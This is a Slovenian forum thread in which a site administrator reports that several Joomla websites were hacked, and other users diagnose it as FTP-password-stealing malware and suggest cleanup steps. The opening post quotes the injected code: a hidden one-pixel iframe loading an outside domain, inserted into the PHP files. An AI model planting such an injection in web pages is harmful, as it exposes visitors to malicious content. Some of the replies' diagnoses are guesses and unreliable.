Vdor v večje stevilo internetnih strani

Pozdravljeni,

na parih spletnih straneh se je zgodil vdor in prosim za informacije in pomoc.

http://www.racunovodskiservis.info
http://www.anasan.si/
http://avtizem.info/
http://cnvos.info/
(avast mi ne pusti gor, Chrome pa javi Malware)
http://cnvos.si/

Najverjetneje se bo iskalo tudi nekoga, ki ve za kaj gre, da zadevo razcisti in pregleda. Mislim da se bo kmalu javil tudi clovek, ki ima cez te strani.

Zaenkrat pa iscem kakrsnekoli informacije o tej skripti:

<iframe src ="http://viewhit.biz" width=1 height=1 style="visibility:hidden">ho $database->_ticker . ' queries executed';

    echo '<pre>';
    foreach ($database->_log as $k=>$sql) {
        echo $k+1 . "\n" . $sql . '<hr />';
    }
    echo '</pre>';
}

doGzip();

?>

Kaj dela ta skripta? Kako je prislo do vdora? Kraja FTP gesel ali kako drugace? Mislite da je prislo prov do vdora na streznik ponudnika? Je mozno da so podatki v bazi kontanimirani? Pri eniih javlja error, pri enih je samo prazna stran (+ izvorna koda), pri enih pa proba povezat na nek cuden pejdz...

Zanimivo je, da so zadeve na locenih streznikih, pri drugacnih ponudnikih gostovanja, razlicne verzije Joomle (1.0 in 1.5) - nekdo se je nacrtno spravil na Joomla related strani teh ljudi.

15 odgovorov

Ta skripta, ki je del manjka ... izpiše iframe, s katerim nekdo skriva svoje sledi ali pa samo prodaja porn ... ali pa kej druga mogoče :)

se pa očitno tudi igra z podatkovno bazo ... težko ti napišem kaj točno, ker del kode kot sem že napisal manjka ...

Za začetek posodobite CMSe ki poganjajo te strani ;)

Kater del kode manjka? :) To je vse kar sem dobil v vednost.

EDIT: sce, gre za Joomla strani in zaenkrat je treba odpraviti vdor, nato pa gledat naprej. Updejtat kontanimiran streznik se mi ne zdi ravno logicno.

Poglej tele teme:
http://www.internetmojster.com/administracija/gumblar-ftp-virus.html
http://www.internetmojster.com/administracija/nov-vdor-in-skodljiva-koda.html

Če strani ne bi bile na Joomli ali Wordpressu, bi normalno delovale, le nek iframe bi imele vstavljen. Na Joomli in Wordpressu pa se žal ob insertiranju kode izbriše še določen del php kode, ki jo vsebuje datoteka, zato stran ne dela. Upam, da imaš backupe, ker se je ta iframe nasral v vse datoteke z imenom "index".

Dobil si virus, ki ti je prebral vsa shranjena gesla za tvoj FTP program, ker si gesla shranil. Znano za Filezillo. Tako ti je nasral vse te strani. Oziroma krivec je tisti, ki je v FTP clientu imel shranjena gesla za dostop do serverja.

hej

a smem vprašat malo vse ki ste ga dobili če ste uspeli ugotoviti od kod ste dobili ta virus?

tnx

Mi se ugotavljamo. Oz. zadeva je taka, da so te strani od nasega poslovnega partnerja, za katerega smo delali mi custom page - tisto kar ni bilo smiselno narediti z Joomlo - na vseh ostalih pa se fura Joomla.

Mika, hvala za povezave, nisem pa mislil da je to to. Bom preveril kako je z backupi...

ok perunpro, hvala vseeno, če zveš oz. če kdo ve bi pa prosil da deli, da se probamo ostali čimbolj izognit temu

@newbe ta (in podobni virusi) je v bistvu virus na računalniku, ki pobere dostopne podatke za FTP in potem nalepi Zloveščo(tm) kodo v konec php datotek.

Dela neodvisno od (ne)CMS-ja.

@Mika: ne gre samo za index datoteke. Ima pač en čuden ključ po katerem izbira datoteke.

Dela pa dosti CMS-jev tudi s tem ampak se pozna občutno pri nalagalnih časih tako, da opaziš tudi če nisi programer, da nekaj ne štima.

@theDegriz tega se zavedam, ampak na računalnik je moral nekako priti in po tem sprašujem, kje so ga staknili

scripta pomojem zbira baze tvoje strani (moje laično znanje PHP). Virus moraš spucat na roko. Najverjetneje je od nekdo dobil FTP dostope (trojanci), nato pa nepridipravi preko FTP potegnejo stran dol, poženejo skripto in jo naložijo nazaj na stran. Mogoče delajo direktno preko FTP, ti bo kakšen heker znal pvoedat.
Najprej zamenjaj vsa FTP gesla, spucaj kodo, šenkrat zamenjaj gesla in jih ne shranjuj nikamor (mogoče pass manger, ali kaj podobnega), ker imaš mogoče na svojem compu še vedno skrit kako žverco, ki ti bere podatke (format?).
Če ti kljub spremembi in pucanju še enkrat vdre notri imaš mogoče kje kakšno luknjo v kodi. Poleg iframe dodajajo notri tud jscripte.
Mogoče ja najhitreje, če celotni FTP potegnepš dol in ga recmo z Avantom skreniraš.

aja, mogoče preveri če imaš folderje na 755 in fileje 644.